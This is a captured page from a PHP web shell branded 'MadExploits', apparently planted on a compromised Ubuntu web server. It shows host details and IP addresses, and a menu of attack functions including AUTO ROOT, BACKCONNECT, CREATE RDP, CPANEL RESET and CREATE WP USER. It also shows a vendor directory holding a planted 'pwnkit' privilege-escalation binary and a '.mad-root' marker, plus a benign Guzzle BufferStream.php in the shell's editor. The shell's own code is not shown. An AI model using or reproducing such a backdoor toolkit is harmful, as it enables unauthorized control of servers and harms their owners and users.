Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.138
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
guzzlehttp /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
AppendStream.php
5.63
KB
-rw-rw-r--
BufferStream.php
3.01
KB
-rw-rw-r--
CachingStream.php
4.24
KB
-rw-rw-r--
DroppingStream.php
1.07
KB
-rw-rw-r--
FnStream.php
3.87
KB
-rw-rw-r--
Header.php
2.13
KB
-rw-rw-r--
InflateStream.php
1.8
KB
-rw-rw-r--
LazyOpenStream.php
900
B
-rw-rw-r--
LimitStream.php
4.13
KB
-rw-rw-r--
Message.php
8.08
KB
-rw-rw-r--
MessageTrait.php
5.8
KB
-rw-rw-r--
MimeType.php
4.99
KB
-rw-rw-r--
MultipartStream.php
4.66
KB
-rw-rw-r--
NoSeekStream.php
439
B
-rw-rw-r--
PumpStream.php
3.99
KB
-rw-rw-r--
Query.php
3.41
KB
-rw-rw-r--
Request.php
3.63
KB
-rw-rw-r--
Response.php
4.7
KB
-rw-rw-r--
Rfc7230.php
691
B
-rw-rw-r--
ServerRequest.php
9.62
KB
-rw-rw-r--
Stream.php
6.65
KB
-rw-rw-r--
StreamDecoratorTrait.php
3.21
KB
-rw-rw-r--
StreamWrapper.php
3.69
KB
-rw-rw-r--
UploadedFile.php
7.59
KB
-rw-rw-r--
Uri.php
22.36
KB
-rw-rw-r--
UriNormalizer.php
8.14
KB
-rw-rw-r--
UriResolver.php
8.58
KB
-rw-rw-r--
Utils.php
14.33
KB
-rw-rw-r--
functions.php
13.09
KB
-rw-rw-r--
functions_include.php
156
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BufferStream.php
<?php namespace GuzzleHttp\Psr7; use Psr\Http\Message\StreamInterface; /** * Provides a buffer stream that can be written to to fill a buffer, and read * from to remove bytes from the buffer. * * This stream returns a "hwm" metadata value that tells upstream consumers * what the configured high water mark of the stream is, or the maximum * preferred size of the buffer. * * @final */ class BufferStream implements StreamInterface { private $hwm; private $buffer = ''; /** * @param int $hwm High water mark, representing the preferred maximum * buffer size. If the size of the buffer exceeds the high * water mark, then calls to write will continue to succeed * but will return false to inform writers to slow down * until the buffer has been drained by reading from it. */ public function __construct($hwm = 16384) { $this->hwm = $hwm; } public function __toString() { return $this->getContents(); } public function getContents() { $buffer = $this->buffer; $this->buffer = ''; return $buffer; } public function close() { $this->buffer = ''; } public function detach() { $this->close(); return null; } public function getSize() { return strlen($this->buffer); } public function isReadable() { return true; } public function isWritable() { return true; } public function isSeekable() { return false; } public function rewind() { $this->seek(0); } public function seek($offset, $whence = SEEK_SET) { throw new \RuntimeException('Cannot seek a BufferStream'); } public function eof() { return strlen($this->buffer) === 0; } public function tell() { throw new \RuntimeException('Cannot determine the position of a BufferStream'); } /** * Reads data from the buffer. */ public function read($length) { $currentLength = strlen($this->buffer); if ($length >= $currentLength) { // No need to slice the buffer because we don't have enough data. $result = $this->buffer; $this->buffer = ''; } else { // Slice up the result to provide a subset of the buffer. $result = substr($this->buffer, 0, $length); $this->buffer = substr($this->buffer, $length); } return $result; } /** * Writes data to the buffer. */ public function write($string) { $this->buffer .= $string; // TODO: What should happen here? if (strlen($this->buffer) >= $this->hwm) { return false; } return strlen($string); } public function getMetadata($key = null) { if ($key == 'hwm') { return $this->hwm; } return $key ? null : []; } }
Close